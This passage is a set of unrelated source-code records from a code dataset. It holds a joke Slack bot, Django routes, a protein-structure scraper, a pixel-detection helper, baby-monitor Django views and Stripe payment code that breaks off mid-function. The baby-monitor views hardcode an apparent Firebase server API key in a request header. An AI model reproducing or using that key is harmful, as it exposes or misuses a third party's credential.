+{"seq_id":"226579719","text":"# -*- coding: utf-8 -*-\n\nimport logging\nimport random\n\nlogger = logging.getLogger(__name__)\n\nclass Messenger(object):\n def __init__(self, slack_clients):\n self.clients = slack_clients\n\n def send_message(self, channel_id, msg):\n # in the case of Group and Private channels, RTM channel payload is a complex dictionary\n if isinstance(channel_id, dict):\n channel_id = channel_id['id']\n logger.debug('Sending msg: %s to channel: %s' % (msg, channel_id))\n channel = self.clients.rtm.server.channels.find(channel_id)\n channel.send_message(msg)\n\n def write_random(self, channel_id):\n sentences = [\n \"I really can't stress enough how important it is to submit to places like {}\",\n \"That reminds me of something I did at {}\",\n \"That reminds me of something I saw at {}\",\n \"Have I told you about {}?\",\n \"So we're looking to model IGGI after {}\",\n \"I'm really a fan of the way we were working at {} last year\",\n \":heart: {} :heart:\"\n ]\n events = [\n \"CEEC\",\n \"Dagstuhl\",\n \"the global game jam\"\n ]\n msg = random.choice(sentences).format(\n random.choice(events)\n )\n self.send_message(channel_id, msg)\n\n def write_advice(self, channel_id):\n sentences = [\n \"I really think {} are the future\",\n \"You know, {} are really powerful, and their shortcomings aren't really that important\",\n \"Have you considered using {}?\",\n \"There's loads of low-hanging fruit around {}\",\n \"You should try combining {} with {} - I think there's a lot of potential there\",\n \"The great thing about {} is that they're so simple, yet powerful\",\n \"I think give it a couple of years and you'll see a lot of games companies using {}\",\n \"A combination of {} and {}... yeah, that could be really powerful\",\n \"It's important to show the games industry that {} are a really promising field\",\n \"I've heard lots of mixed feedback about {} recently, but I think it's great\",\n \"I think we should try using {} to improve {}\",\n \"I think you're underestimating {} - they're really good, and could be used anywhere\",\n \"The fact that industry are ignoring {} means nothing - they're really the best\",\n \"You need to go out and tell industry all about {}. 
Or {} - I've not decided\"\n ]\n subject = [\n \"whale\",\n \"pigeon\",\n \"dinosaur\",\n \"tank\",\n \"game developer\",\n \"computer scientist\"\n ]\n technologies = [\n \"MCTS approaches\",\n \"deep learning approaches\",\n \"evolutionary algorithms\",\n \"game jams\",\n \"student-led interest groups\",\n \"Slack bots\",\n \"AI competitions\",\n \"\\\"AI guided game design\\\" approaches\",\n \"single layer perceptrons\",\n \"the IGGI training modules\",\n \"my speeches\",\n random.choice(subject) + \" dating sims\"\n ]\n msg = random.choice(sentences).format(\n random.choice(technologies),\n random.choice(technologies)\n )\n self.send_message(channel_id, msg)\n\n def write_grandiose(self, channel_id):\n countries = [\n \"Albania\",\n \"Algeria\",\n \"Argentina\",\n \"Armenia\",\n \"Australia\",\n \"Austria\",\n \"Bangladesh\",\n \"Barbados\",\n \"Belarus\",\n \"Belgium\",\n \"Bermuda\",\n \"Bolivia\",\n \"Botswana\",\n \"Brazil\",\n \"Bulgaria\",\n \"Cambodia\",\n \"Cameroon\",\n \"Canada\",\n \"Chile\",\n \"China\",\n \"Costa Rica\",\n \"Croatia\",\n \"Cuba\",\n \"Cyprus\",\n \"the Czech Republic\",\n \"Denmark\",\n \"Ecuador\",\n \"Egypt\",\n \"Estonia\",\n \"Finland\",\n \"France\",\n \"Gambia\",\n \"Georgia\",\n \"Germany\",\n \"Greenland\",\n \"Guam\",\n \"Guatemala\",\n \"Hungary\",\n \"Iceland\",\n \"India\",\n \"Indonesia\",\n \"Ireland\",\n \"Italy\",\n \"Jamaica\",\n \"Kenya\",\n \"Latvia\",\n \"Lithuania\",\n \"Luxembourg\",\n \"Macedonia\",\n \"Madagascar\",\n \"Malaysia\",\n \"Malta\",\n \"Monaco\",\n \"Mongolia\",\n \"Morocco\",\n \"Nigeria\",\n \"Oman\",\n \"Panama\",\n \"Paraguay\",\n \"Peru\",\n \"Poland\",\n \"Portugal\",\n \"Romania\",\n \"Russia\",\n \"Saudi Arabia\",\n \"Slovakia\",\n \"Slovenia\",\n \"South Africa\",\n \"Spain\",\n \"Switzerland\",\n \"Thailand\",\n \"Tunisia\",\n \"Turkey\",\n \"Uganda\",\n \"the Vatican\",\n \"Venezuela\",\n \"Vietnam\",\n \"Zambia\",\n \"Zimbabwe\"\n ]\n nouns = [\n \"police dog training\",\n \"professional calligraphy\",\n \"eSports\",\n \"film\",\n \"music\",\n \"goat-herding\",\n \"medical\",\n \"bot generation\"\n ]\n subjects = [\n \"games for dealing with mental health\",\n \"proving philosophical theories\",\n \"generating awesome art\",\n \"convincing the games industry that Java is performant\",\n \"some shit to do with linguistics\",\n \"reading brain signals to control games\",\n \"doing cool things with VR and AR\",\n \"getting AI researchers to admit they have emotions\",\n \"chasing up deadlines and conference budgets\",\n \"snarky bot generation\",\n \"artificial general intelligence\",\n \"getting us closer to the robot apocalypse\",\n \"finding more grant money\"\n ]\n sentences_start = [\n \"When I started this it all seemed crazy. Look at us now.\",\n \"Why is IGGI important? Let me tell you.\",\n \"Developers, developers, developers.\",\n \"Games. They're important.\",\n \"I'm not going to say too much - you're the important ones.\",\n \"I know everyone wants to be doing their own thing now, so I'll keep this quick.\"\n ]\n sentences_mid = [\n \" Everyone plays games. 
Even some animals play games.\",\n            \" Every day we change the world {}%.\".format(random.randint(5,40)),\n            \" I look around and see so many young, exciting researchers.\",\n            \" Every single one of you students are technical, and that's great.\",\n            \" The games industry are chomping at the bit to speak to us - so they should.\",\n            \" The games industry is now larger than the {} industry and {} industry combined.\".format(random.choice(nouns), random.choice(nouns)),\n            \" We're really exciting the games industry.\",\n            \" We are now the largest group of games researchers in the world.\",\n            \" We've got people here working on areas as diverse as {} and {}.\".format(random.choice(subjects), random.choice(subjects)),\n            \" We've got software that has been downloaded {} of times.\".format(random.choice([\"thousands\", \"millions\", \"billions\", \"an infinite amount\"])),\n            \" The games industry is bigger than the GDP of {}.\".format(random.choice(countries))\n        ]\n        sentences_end = [\n            \" Just think about how great that is.\",\n            \" And that's really exciting.\",\n            \" And I really mean that.\",\n            \".. I'm aware that I've been talking for ages now, so I'll shut up.\",\n            \" And that's really exciting. Now over to you.\"\n        ]\n        self.send_message(channel_id, \"{}{}{}\".format(\n            random.choice(sentences_start),\n            random.choice(sentences_mid),\n            random.choice(sentences_end)\n        ))\n\n    def write_about(self, channel_id):\n        msg = \"I'm ProfBot, the totally unique and not-inspired-by-real-people Slack bot. Details at github.com/bedder/ProfBot\"\n        self.send_message(channel_id, msg)\n\n    def write_help(self, channel_id):\n        sentences = [\n            \"Uh huh, uh huh... I see what you're saying. Honest.\",\n            \"Could you repeat that, with a few more buzzwords?\",\n            \"I'm not sure I follow.\"\n        ]\n        self.send_message(channel_id, random.choice(sentences))\n","sub_path":"bot/messenger.py","file_name":"messenger.py","file_ext":"py","file_size_in_byte":8783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
+{"seq_id":"486852386","text":"from django.conf.urls import url\n#from mahasiswa import views\nfrom . import views\nfrom . 
import views as core_views\nfrom django.conf.urls import url\nfrom django.contrib import admin\nfrom django.contrib.auth import views as auth_views\n\n\nurlpatterns = [\n\n # url(r'^anggota/$', views.anggota, name='anggota'),\n url(r'anggota/', views.anggota, name='anggota'),\n url(r'^profil/', views.profil, name='profil'),\n url(r'^riset/', views.riset, name='riset'),\n url(r'^ebook/', views.ebook, name='ebook'),\n\n # ex: /polls/\n url(r'^$', views.index, name='index'),\n url(r'^signup/$', core_views.signup, name='signup'),\n # # ex: /polls/5/0\n url(r'^profile/(?P[0-9]+)/$', views.detail, name='detail'),\n # # ex: /polls/5/results/\n # url(r'^(?P[0-9]+)/results/$', views.results, name='results'),\n # # ex: /polls/5/vote/\n # url(r'^(?P[0-9]+)/vote/$', views.vote, name='vote'),\n\n url(r'^login/$', auth_views.login, name='login'),\n url(r'^logout/$', auth_views.logout, name='logout'),\n\n\n url(r'^model_form_upload/$', views.model_form_upload, name='model_form_upload'),\n url(r'^journal_form_upload/$', views.journal_form_upload, name='journal_form_upload'),\n url(r'^kontak/$', views.kontak, name='kontak'),\n] \n\n\n\n","sub_path":"src/mahasiswa/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"496588072","text":"#!/usr/bin/python\n# coding=utf-8\n\n###################################### 通过MMDB查看PDB的Polymeric state #\n\nimport requests\nfrom bs4 import BeautifulSoup\n\nworkdir = 'E:/PremPS/ProteinStability/ProcessDataset/Datasets/'\n\nS2648 = open(workdir+'OriginalDataFromReferences/popmusic_S2648.txt','r')\nS2648.next()\npdblist = []\nfor line in S2648:\n newline = line.strip().split('\\t')\n pdb = newline[0].split('_')[0].strip().upper()\n if pdb not in pdblist:\n pdblist.append(pdb)\n\n# pdb = '1ACB'\n# url = 'https://www.rcsb.org/structure/{}'.format(pdb)\n# GetPDBinfo = requests.get(url)._content\n# soup = BeautifulSoup(GetPDBinfo, 'html.parser')\n# soup.find_all('h5')\n# r'(\\d+)$'字符串最后面的一串数字\n# r'^(\\d+)'字符串最前面的一串数字\n# re.findall(r'(\\d+)$', soup.find('h5').text).pop(0)\n\n## 根据PDB数据库中的信息判断分类\n# classifyPDB = {}\n# for pdb in pdblist:\n# url = 'https://www.rcsb.org/structure/{}'.format(pdb)\n# GetPDBinfo = requests.get(url)._content\n# soup = BeautifulSoup(GetPDBinfo, 'html.parser')\n# if len(soup.find_all('h5')) != 1:\n# classifyPDB[pdb] = 'Complex'\n# elif len(soup.find(attrs={'class':'ellipsisToolTip'}).text.split(',')) == 1:\n# classifyPDB[pdb] = 'Monomer'\n# elif len(soup.find(attrs={'class': 'ellipsisToolTip'}).text.split(',')) == 2:\n# classifyPDB[pdb] = 'Dimer'\n# elif len(soup.find(attrs={'class': 'ellipsisToolTip'}).text.split(',')) == 3:\n# classifyPDB[pdb] = 'Trimer'\n# elif len(soup.find(attrs={'class': 'ellipsisToolTip'}).text.split(',')) == 4:\n# classifyPDB[pdb] = 'Tetramer'\n# elif len(soup.find(attrs={'class': 'ellipsisToolTip'}).text.split(',')) == 5:\n# classifyPDB[pdb] = 'Pentamer'\n# elif len(soup.find(attrs={'class': 'ellipsisToolTip'}).text.split(',')) == 6:\n# classifyPDB[pdb] = 'Hexamer'\n# else:\n# classifyPDB[pdb] = 'Other'\n#\n# fw = open(workdir+'S2648ClassifyByPDB.txt','w')\n# fw.write('PDBid\\tClassify\\n')\n# for key in classifyPDB:\n# fw.write('%s\\t%s\\n'%(key,classifyPDB[key]))\n# fw.close()\n\n## 根据MMDB查找分类信息\nfw = open(workdir+'S2648ClassifyByMMDB_new.txt','w')\nfw.write('PDBid\\tClassify\\tSource\\n')\n\nfor pdb in pdblist:\n url = 'https://www.ncbi.nlm.nih.gov/Structure/mmdb/mmdbsrv.cgi?dps=1&uid={}'.format(pdb)\n 
GetPDBinfo = requests.get(url)._content\n soup = BeautifulSoup(GetPDBinfo, 'html.parser')\n try:\n classifylist = soup.find_all(attrs={'class':'biotext'})\n length = len(classifylist)\n i = 0\n while i < int(length):\n classify = classifylist[i].text.split(';')[0].split(':')[1]\n if 'PISA' in classifylist[i].text:\n source = 'PISA'\n elif 'author' in classifylist[i].text:\n source = 'author'\n else:\n source = 'other'\n fw.write(pdb+'\\t'+classify+'\\t'+source+'\\n')\n i = i+1\n except:\n fw.write(pdb +'\\tNONE\\tNONE\\n')\n\n# fw = open(workdir+'S2648ClassifyByMMDB.txt','w')\n# fw.write('PDBid\\tClassify\\n')\n# for key in classifyMMDB:\n# fw.write('%s\\t%s\\n'%(key,classifyMMDB[key]))\n# fw.close()\n\n# S2648 = open(workdir+'OriginalDataFromReferences/popmusic_S2648.txt','r')\n# title = S2648.next()\n# fw = open(workdir+'S2648AddClassify_1.txt','w')\n# newtitle = title.strip()+'\\t'+'PDBClassify'+'\\t'+'MMDBClassify'+'\\n'\n# fw.write(newtitle)\n# for line in S2648:\n# newline = line.strip().split('\\t')\n# pdb = newline[0].split('_')[0].strip().upper()\n# fw.write(line.strip()+'\\t'+classifyPDB[pdb]+'\\t'+classifyMMDB[pdb]+'\\n')\n# fw.close()","sub_path":"Webserver/Extract_Polymeric_FromMMDB.py","file_name":"Extract_Polymeric_FromMMDB.py","file_ext":"py","file_size_in_byte":3630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"592680524","text":"from fishing_event import *\n\n\ndef GetKeypointFromImage(img):\n # Setup SimpleBlobDetector parameters.\n hsvImg = cv2.cvtColor(img, cv2.COLOR_RGB2HSV)\n lower = (99, 254, 100)\n upper = (100, 255, 101)\n mask = cv2.inRange(hsvImg, lower, upper)\n\n # Setup SimpleBlobDetector parameters.\n params = cv2.SimpleBlobDetector_Params()\n\n # Change thresholds\n params.minThreshold = 10\n params.maxThreshold = 255\n\n params.filterByColor = True\n params.blobColor = 255\n\n params.filterByCircularity = False\n params.filterByConvexity = False\n params.filterByInertia = False\n\n params.filterByArea = True\n params.minArea = 10.0\n\n detector = cv2.SimpleBlobDetector_create(params)\n\n # Detect blobs.\n keypoints = detector.detect(mask)\n\n if len(keypoints) <= 0:\n return None\n\n return int(keypoints[0].pt[0]), int(keypoints[0].pt[1])\n\n\nclass PixelLoc:\n val = None\n\n @staticmethod\n def config():\n win = Window()\n t = GetKeypointFromImage(win.getCapture())\n\n if t is None:\n return False\n\n PixelLoc.val = (t[0], t[1], t[0] + 1, t[1] + 1)\n return True\n","sub_path":"pixel_loc.py","file_name":"pixel_loc.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"441588225","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom .forms import *\nfrom account.models import User\nfrom .models import *\nimport cv2 as cv\nimport tensorflow\nimport logging\nimport secrets\nimport json\nfrom django.views.decorators.http import require_POST\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http import HttpResponse, HttpResponseForbidden, JsonResponse\nfrom parent.models import UserToken\nfrom babysecurity import settings\nimport requests\nlogger = logging.getLogger(__name__)\n\ndef frame2_happy(point):\n if bool(point) == False :\n return False\n else :\n return True\ndef frame3_hp(pt):\n for ptt in pt:\n u = pt[ptt]\n if u == True:\n return \"0\"\n if u == False:\n return \"1\"\n\ndef beingReverse(filePath):\n try:\n BODY_PARTS = {\"Nose\": 0, \"Neck\": 1, 
\"RShoulder\": 2, \"RElbow\": 3, \"RWrist\": 4,\n \"LShoulder\": 5, \"LElbow\": 6, \"LWrist\": 7, \"RHip\": 8, \"RKnee\": 9,\n \"RAnkle\": 10, \"LHip\": 11, \"LKnee\": 12, \"LAnkle\": 13, \"REye\": 14,\n \"LEye\": 15, \"REar\": 16, \"LEar\": 17, \"Background\": 18}\n POSE_PAIRS = [[\"Neck\", \"RShoulder\"], [\"Neck\", \"LShoulder\"], [\"RShoulder\", \"RElbow\"],\n [\"RElbow\", \"RWrist\"], [\"LShoulder\", \"LElbow\"], [\"LElbow\", \"LWrist\"],\n [\"Neck\", \"RHip\"], [\"RHip\", \"RKnee\"], [\"RKnee\", \"RAnkle\"], [\"Neck\", \"LHip\"],\n [\"LHip\", \"LKnee\"], [\"LKnee\", \"LAnkle\"], [\"Neck\", \"Nose\"], [\"Nose\", \"REye\"],\n [\"REye\", \"REar\"], [\"Nose\", \"LEye\"], [\"LEye\", \"LEar\"]]\n net = cv.dnn.readNetFromTensorflow(\"./graph_opt.pb\")\n img = cv.imread(filePath, cv.IMREAD_ANYCOLOR)\n net.setInput(cv.dnn.blobFromImage(img, 1.0, (368, 368), (127.5, 127.5, 127.5), swapRB=True, crop=False))\n out = net.forward()\n out = out[:, :19, :, :]\n assert (len(BODY_PARTS) == out.shape[1])\n points = []\n for i in range(len(BODY_PARTS)):\n heatMap = out[0, i, :, :]\n _, conf, _, point = cv.minMaxLoc(heatMap)\n x = (368 * point[0]) / out.shape[3]\n y = (368 * point[1]) / out.shape[2]\n points.append((int(x), int(y)) if conf > 0.2 else None)\n for pair in POSE_PAIRS:\n partFrom = pair[0]\n partTo = pair[1]\n assert (partFrom in BODY_PARTS)\n assert (partTo in BODY_PARTS)\n ap = frame2_happy(points[0])\n bp = frame2_happy(points[14])\n cp = frame2_happy(points[15])\n dp = frame2_happy(points[16])\n ep = frame2_happy(points[17])\n hp = [ap, bp, cp, dp, ep];\n result = 0\n result = frame3_hp(hp)\n return result\n except Exception as ex:\n print(ex)\n\ndef createProduction(request):\n if request.method == \"POST\":\n createProductionForm = CreationProductionForm(request.POST)\n if createProductionForm.is_valid():\n jsonResponse = {}\n try:\n createProduction = createProductionForm.save(commit=False)\n jsonResponse[\"status\"] = 1\n jsonResponse[\"authentication\"] = createProduction.authentication\n createProduction.save()\n except Exception as ex:\n logger.debug\n jsonResponse[\"status\"] = 1\n return JsonResponse(jsonResponse)\n else:\n return render(request, \"rasberrypy/createProduction.html\", {\n \"createProductionForm\": CreationProductionForm()\n })\n\ndef productAuth(request):\n try:\n if request.method == \"POST\":\n productActiveForm = ProductionActiveForm(request.POST)\n jsonObject = {}\n if productActiveForm.is_valid():\n user = User.objects.get(userId=productActiveForm.cleaned_data[\"userId\"])\n product = Product.objects.get(id=user.productionKey)\n if product.authentication == productActiveForm.cleaned_data[\"authentication\"]:\n product.isActive = True\n user.is_active = True\n product.save()\n user.save()\n else:\n logging.debug\n return JsonResponse(jsonObject)\n\n else:\n return render(request, \"rasberrypy/auth.html\", {\n \"productActiveForm\": ProductionActiveForm()\n })\n except Exception as ex:\n logger.debug\n\ndef imageUpload(request):\n if request.method == \"GET\":\n return render(request, \"rasberrypy/uploadImage.html\",{\n \"babyPictureForm\" : BabyPictureForm()\n })\n else:\n babyPicutreForm = BabyPictureForm(request.POST,request.FILES)\n if babyPicutreForm.is_valid():\n product = Product.objects.get(authentication=babyPicutreForm.cleaned_data[\"authentication\"])\n babyPicture = babyPicutreForm.save(commit=False)\n babyPicture.productionKey = product\n babyPicture.save()\n babyPicture.isReverse = beingReverse(settings.MEDIA_ROOT + \"/\" + 
babyPicture.realTitle)\n babyPicture.save()\n if babyPicture.isReverse:\n user = User.objects.get(productionKey=product.id)\n userToken = UserToken.objects.get(user = user )\n \n headers = {\"Authorization\" : \"key=AAAARenGXtY:APA91bGHctGwh5AmR7kJ6hVr0a-boD_BJoKhlHfjkswIeEJyJ91Kdp6iv3SLReRFIuRH26hUrhhM_eM8So8MGU0OLzH4jER_h5QQ8dhRCw0VeK0hv7y_HmDIxlJjZGuZpVVMcyFvqWwu\",\n \"Content-Type\" : \"application/json\"}\n\n\n dic = {\"data\" : {\"IsReverse\" : \"Reverse\"},\"to\": userToken.token,\"priority\":\"high\"}\n requests.post(\"https://fcm.googleapis.com/fcm/send\",data=json.dumps(dic),headers = headers)\n return JsonResponse(dic)\n return render(request, \"rasberrypy/uploadImage.html\", {\n \"babyPictureForm\": BabyPictureForm()\n })\n\ndef createBabyTemperature(request):\n if request.method == \"GET\":\n return render(request, \"rasberrypy/createBabyTemperature.html\",{\n \"babySickForm\" : BabySickForm()\n })\n else:\n babySickForm = BabySickForm(request.POST)\n if babySickForm.is_valid():\n product = Product.objects.get(authentication=babySickForm.cleaned_data[\"authentication\"])\n babySick = babySickForm.save(commit=False)\n babySick.productionKey = product\n babySickForm.save()\n\n\n@require_POST\n@csrf_exempt\ndef startStream(request):\n stream = get_object_or_404(Stream, key=request.POST[\"name\"])\n if not stream.user.is_active:\n return HttpResponseForbidden(\"Inactive user\")\n\n if stream.started_at:\n return HttpResponseForbidden(\"Already streaming\")\n\n stream.save()\n\n # Redirect to the streamer's public username\n return redirect(stream.productKey)\n\n@require_POST\n@csrf_exempt\ndef stop_stream(request):\n Stream.objects.filter(key=request.POST[\"name\"]).update(createTime=None)\n return HttpResponse(\"OK\")\n","sub_path":"rasberrypy/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"497943190","text":"from decimal import Decimal\nfrom time import sleep\n\nfrom psycopg2.extras import execute_batch\nimport stripe\nimport stripe.error\n\nfrom ..exceptions import NextAction\nfrom ..i18n.currencies import Money\nfrom ..models.exchange_route import ExchangeRoute\nfrom ..website import website\nfrom .common import abort_payin, resolve_amounts, update_payin, update_payin_transfer\n\n\n# https://stripe.com/docs/currencies#presentment-currencies\nZERO_DECIMAL_CURRENCIES = \"\"\"\n BIF CLP DJF GNF JPY KMF KRW MGA PYG RWF UGX VND VUV XAF XOF XPF\n\"\"\".split()\n\n\ndef int_to_Money(amount, currency):\n currency = currency.upper()\n if currency in ZERO_DECIMAL_CURRENCIES:\n return Money(Decimal(amount), currency)\n return Money(Decimal(amount) / 100, currency)\n\n\ndef Money_to_int(m):\n if m.currency in ZERO_DECIMAL_CURRENCIES:\n return int(m.amount)\n return int(m.amount * 100)\n\n\ndef repr_stripe_error(e):\n \"\"\"Given a `StripeError` exception, return an error message suitable for display.\n \"\"\"\n msg = e.user_message or e.code\n return '%s (request ID: %s)' % (msg, e.request_id)\n\n\ndef repr_charge_error(charge):\n \"\"\"Given a `Charge` object, return an error message suitable for display.\n \"\"\"\n if charge.status != 'failed':\n return\n return '%s (code %s)' % (charge.failure_message, charge.failure_code)\n\n\ndef get_partial_iban(sepa_debit):\n return '%s⋯%s' % (sepa_debit.country, sepa_debit.last4)\n\n\ndef charge_and_transfer(db, payin, payer, statement_descriptor, on_behalf_of=None):\n \"\"\"Create a standalone Charge then multiple 
Transfers.\n\n Doc: https://stripe.com/docs/connect/charges-transfers\n\n As of January 2019 this only works if the recipients are in the SEPA.\n\n \"\"\"\n assert payer.id == payin.payer\n amount = payin.amount\n route = ExchangeRoute.from_id(payer, payin.route)\n intent = None\n try:\n if route.address.startswith('pm_'):\n intent = stripe.PaymentIntent.create(\n amount=Money_to_int(amount),\n confirm=True,\n currency=amount.currency.lower(),\n customer=route.remote_user_id,\n metadata={'payin_id': payin.id},\n on_behalf_of=on_behalf_of,\n payment_method=route.address,\n return_url=payer.url('giving/pay/stripe/%i' % payin.id),\n statement_descriptor=statement_descriptor,\n idempotency_key='payin_intent_%i' % payin.id,\n )\n else:\n charge = stripe.Charge.create(\n amount=Money_to_int(amount),\n currency=amount.currency.lower(),\n customer=route.remote_user_id,\n metadata={'payin_id': payin.id},\n on_behalf_of=on_behalf_of,\n source=route.address,\n statement_descriptor=statement_descriptor,\n expand=['balance_transaction'],\n idempotency_key='payin_%i' % payin.id,\n )\n except stripe.error.StripeError as e:\n return abort_payin(db, payin, repr_stripe_error(e))\n except Exception as e:\n website.tell_sentry(e, {})\n return abort_payin(db, payin, str(e))\n if intent:\n if intent.status == 'requires_action':\n update_payin(db, payin.id, None, 'awaiting_payer_action', None,\n intent_id=intent.id)\n raise NextAction(intent)\n else:\n charge = intent.charges.data[0]\n intent_id = getattr(intent, 'id', None)\n payin = settle_charge_and_transfers(db, payin, charge, intent_id=intent_id)\n send_payin_notification(payin, payer, charge, route)\n return payin\n\n\ndef destination_charge(db, payin, payer, statement_descriptor):\n \"\"\"Create a Destination Charge.\n\n Doc: https://stripe.com/docs/connect/destination-charges\n\n Destination charges don't have built-in support for processing payments\n \"at cost\", so we (mis)use transfer reversals to recover the exact amount of\n the Stripe fee.\n\n \"\"\"\n assert payer.id == payin.payer\n pt = db.one(\"SELECT * FROM payin_transfers WHERE payin = %s\", (payin.id,))\n destination = db.one(\"SELECT id FROM payment_accounts WHERE pk = %s\", (pt.destination,))\n amount = payin.amount\n route = ExchangeRoute.from_id(payer, payin.route)\n intent = None\n if destination == 'acct_1ChyayFk4eGpfLOC':\n # Stripe rejects the charge if the destination is our own account\n destination = None\n try:\n if route.address.startswith('pm_'):\n intent = stripe.PaymentIntent.create(\n amount=Money_to_int(amount),\n confirm=True,\n currency=amount.currency.lower(),\n customer=route.remote_user_id,\n metadata={'payin_id': payin.id},\n on_behalf_of=destination,\n payment_method=route.address,\n return_url=payer.url('giving/pay/stripe/%i' % payin.id),\n statement_descriptor=statement_descriptor,\n transfer_data={'destination': destination} if destination else None,\n idempotency_key='payin_intent_%i' % payin.id,\n )\n else:\n charge = stripe.Charge.create(\n amount=Money_to_int(amount),\n currency=amount.currency.lower(),\n customer=route.remote_user_id,\n destination={'account': destination} if destination else None,\n metadata={'payin_id': payin.id},\n source=route.address,\n statement_descriptor=statement_descriptor,\n expand=['balance_transaction'],\n idempotency_key='payin_%i' % payin.id,\n )\n except stripe.error.StripeError as e:\n return abort_payin(db, payin, repr_stripe_error(e))\n except Exception as e:\n website.tell_sentry(e, {})\n return abort_payin(db, payin, 
str(e))\n if intent:\n if intent.status == 'requires_action':\n update_payin(db, payin.id, None, 'awaiting_payer_action', None,\n intent_id=intent.id)\n raise NextAction(intent)\n else:\n charge = intent.charges.data[0]\n intent_id = getattr(intent, 'id', None)\n payin = settle_destination_charge(db, payin, charge, pt, intent_id=intent_id)\n send_payin_notification(payin, payer, charge, route)\n return payin\n\n\ndef send_payin_notification(payin, payer, charge, route):\n \"\"\"Send the legally required notification for SEPA Direct Debits.\n \"\"\"\n if route.network == 'stripe-sdd' and charge.status != 'failed':\n if route.address.startswith('pm_'):\n raise NotImplementedError()\n else:\n sepa_debit = stripe.Source.retrieve(route.address).sepa_debit\n payer.notify(\n 'payin_sdd_created',\n force_email=True,\n payin_id=payin.id, # unused but required for uniqueness\n payin_amount=payin.amount,\n bank_name=getattr(sepa_debit, 'bank_name', None),\n partial_bank_account_number=get_partial_iban(sepa_debit),\n mandate_url=sepa_debit.mandate_url,\n mandate_id=sepa_debit.mandate_reference,\n mandate_creation_date=route.ctime.date(),\n creditor_identifier=website.app_conf.sepa_creditor_identifier,\n )\n\n\ndef settle_payin(db, payin):\n \"\"\"Check the status of a payin, take appropriate action if it has changed.\n \"\"\"\n if payin.intent_id:\n intent = stripe.PaymentIntent.retrieve(payin.intent_id)\n if intent.status == 'requires_action':\n raise NextAction(intent)\n err = intent.last_payment_error\n if err and intent.status in ('requires_payment_method', 'canceled'):\n charge_id = getattr(err, 'charge', None)\n return update_payin(db, payin.id, charge_id, 'failed', err.message)\n if intent.charges.data:\n charge = intent.charges.data[0]\n else:\n return payin\n else:\n charge = stripe.Charge.retrieve(payin.remote_id)\n return settle_charge(db, payin, charge)\n\n\ndef settle_charge(db, payin, charge):\n \"\"\"Handle a charge's status change.\n \"\"\"\n if charge.destination:\n pt = db.one(\"SELECT * FROM payin_transfers WHERE payin = %s\", (payin.id,))\n return settle_destination_charge(db, payin, charge, pt)\n else:\n return settle_charge_and_transfers(db, payin, charge)\n\n\ndef settle_charge_and_transfers(db, payin, charge, intent_id=None):\n \"\"\"Record the result of a charge, and execute the transfers if it succeeded.\n \"\"\"\n if getattr(charge, 'balance_transaction', None):\n bt = charge.balance_transaction\n if isinstance(bt, str):\n bt = stripe.BalanceTransaction.retrieve(bt)\n amount_settled = int_to_Money(bt.amount, bt.currency)\n fee = int_to_Money(bt.fee, bt.currency)\n net_amount = amount_settled - fee\n else:\n amount_settled, fee, net_amount = None, None, None\n\n error = repr_charge_error(charge)\n payin = update_payin(\n db, payin.id, charge.id, charge.status, error,\n amount_settled=amount_settled, fee=fee, intent_id=intent_id\n )\n\n if amount_settled is not None:\n # We have to update the transfer amounts in a single transaction to\n # avoid ending up in an inconsistent state.\n with db.get_cursor() as cursor:\n payin_transfers = cursor.all(\"\"\"\n SELECT id, amount\n FROM payin_transfers\n WHERE payin = %s\n ORDER BY id\n FOR UPDATE\n \"\"\", (payin.id,))\n transfer_amounts = resolve_amounts(net_amount, {\n pt.id: pt.amount.convert(amount_settled.currency) for pt in payin_transfers\n })\n args_list = [\n (transfer_amounts[pt.id], pt.id) for pt in payin_transfers\n if pt.amount != transfer_amounts[pt.id]\n ]\n if args_list:\n execute_batch(cursor, \"\"\"\n UPDATE 
payin_transfers\n SET amount = %s\n WHERE id = %s\n AND status <> 'succeeded';\n \"\"\", args_list)\n\n payin_transfers = db.all(\"\"\"\n SELECT pt.*, pa.id AS destination_id\n FROM payin_transfers pt\n JOIN payment_accounts pa ON pa.pk = pt.destination\n WHERE pt.payin = %s\n ORDER BY pt.id\n \"\"\", (payin.id,))\n if amount_settled is not None:\n for pt in payin_transfers:\n if pt.destination_id == 'acct_1ChyayFk4eGpfLOC':\n update_payin_transfer(db, pt.id, None, charge.status, error)\n elif pt.status == 'pre':\n execute_transfer(db, pt, pt.destination_id, charge.id)\n elif charge.status == 'failed':\n for pt in payin_transfers:\n update_payin_transfer(db, pt.id, None, charge.status, error)\n\n return payin\n\n\ndef execute_transfer(db, pt, destination, source_transaction):\n \"\"\"Create a Transfer.\n\n Args:\n pt (Record): a row from the `payin_transfers` table\n destination (str): the Stripe ID of the destination account\n source_transaction (str): the ID of the Charge this transfer is linked to\n\n Returns:\n Record: the row updated in the `payin_transfers` table\n\n \"\"\"\n try:\n tr = stripe.Transfer.create(\n amount=Money_to_int(pt.amount),\n currency=pt.amount.currency,\n destination=destination,\n metadata={'payin_transfer_id': pt.id},\n source_transaction=source_transaction,\n idempotency_key='payin_transfer_%i' % pt.id,\n )\n except stripe.error.StripeError as e:\n if e.code == 'idempotency_key_in_use':\n # Two threads are submitting this same request at the same time,\n # retry in a second.\n sleep(1)\n return execute_transfer(db, pt, destination, source_transaction)\n website.tell_sentry(e, {})\n return update_payin_transfer(db, pt.id, '', 'failed', repr_stripe_error(e))\n except Exception as e:\n website.tell_sentry(e, {})\n return update_payin_transfer(db, pt.id, '', 'failed', str(e))\n # `Transfer` objects don't have a `status` attribute, so if no exception was\n # raised we assume that the transfer was successful.\n return update_payin_transfer(db, pt.id, tr.id, 'succeeded', None)\n\n\ndef settle_destination_charge(db, payin, charge, pt, intent_id=None):\n \"\"\"Record the result of a charge, and recover the fee.\n \"\"\"\n if getattr(charge, 'balance_transaction', None):\n bt = charge.balance_transaction\n if isinstance(bt, str):\n 